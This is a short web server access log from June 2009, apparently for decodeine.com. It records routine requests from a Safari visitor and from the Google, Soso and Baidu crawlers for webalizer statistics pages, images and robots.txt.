91.121.163.92 - - [25/Jun/2009:00:10:17 +0100] "GET /webalizer/usage_200905.html HTTP/1.0" 200 144388 "-" "-" 70 144714
71.212.78.146 - - [25/Jun/2009:00:36:51 +0100] "GET /webalizer/daily_usage_200607.png HTTP/1.1" 200 3880 "http://www.decodeine.com/webalizer/usage_200607.html" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_7; en-us) AppleWebKit/530.18 (KHTML, like Gecko) Version/4.0.1 Safari/530.18" 368 4239
71.212.78.146 - - [25/Jun/2009:00:36:51 +0100] "GET /webalizer/hourly_usage_200607.png HTTP/1.1" 200 2161 "http://www.decodeine.com/webalizer/usage_200607.html" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_7; en-us) AppleWebKit/530.18 (KHTML, like Gecko) Version/4.0.1 Safari/530.18" 369 2519
71.212.78.146 - - [25/Jun/2009:00:36:50 +0100] "GET /webalizer/usage_200607.html HTTP/1.1" 200 106726 "http://www.google.com/search?client=safari&rls=en-us&q=dsl001-134-155.sea1.dsl.speakeasy.net&ie=UTF-8&oe=UTF-8" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_7; en-us) AppleWebKit/530.18 (KHTML, like Gecko) Version/4.0.1 Safari/530.18" 508 107089
71.212.78.146 - - [25/Jun/2009:00:36:52 +0100] "GET /webalizer/ctry_usage_200607.png HTTP/1.1" 200 5504 "http://www.decodeine.com/webalizer/usage_200607.html" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_7; en-us) AppleWebKit/530.18 (KHTML, like Gecko) Version/4.0.1 Safari/530.18" 367 5863
71.212.78.146 - - [25/Jun/2009:00:36:53 +0100] "GET /favicon.ico HTTP/1.1" 404 358 "http://www.decodeine.com/webalizer/usage_200607.html" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_7; en-us) AppleWebKit/530.18 (KHTML, like Gecko) Version/4.0.1 Safari/530.18" 347 641
66.249.66.233 - - [25/Jun/2009:00:45:34 +0100] "GET /ob4.jpg HTTP/1.1" 304 - "-" "Googlebot-Image/1.0" 235 255
66.249.66.233 - - [25/Jun/2009:00:58:33 +0100] "GET /bs08.jpg HTTP/1.1" 304 - "-" "Googlebot-Image/1.0" 236 256
124.115.0.160 - - [25/Jun/2009:02:08:19 +0100] "HEAD / HTTP/1.1" 200 - "http://www.decodeine.com/" "Sosospider+(+http://help.soso.com/webspider.htm)" 244 359
66.249.66.233 - - [25/Jun/2009:02:31:38 +0100] "GET /no-text-6856363889111595493 HTTP/1.1" 404 374 "-" "Googlebot-Image/1.0" 255 658
66.249.66.233 - - [25/Jun/2009:03:23:35 +0100] "GET /ob11.jpg HTTP/1.1" 304 - "-" "Googlebot-Image/1.0" 236 256
123.125.66.25 - - [25/Jun/2009:05:04:59 +0100] "GET /robots.txt HTTP/1.1" 404 357 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)" 205 603
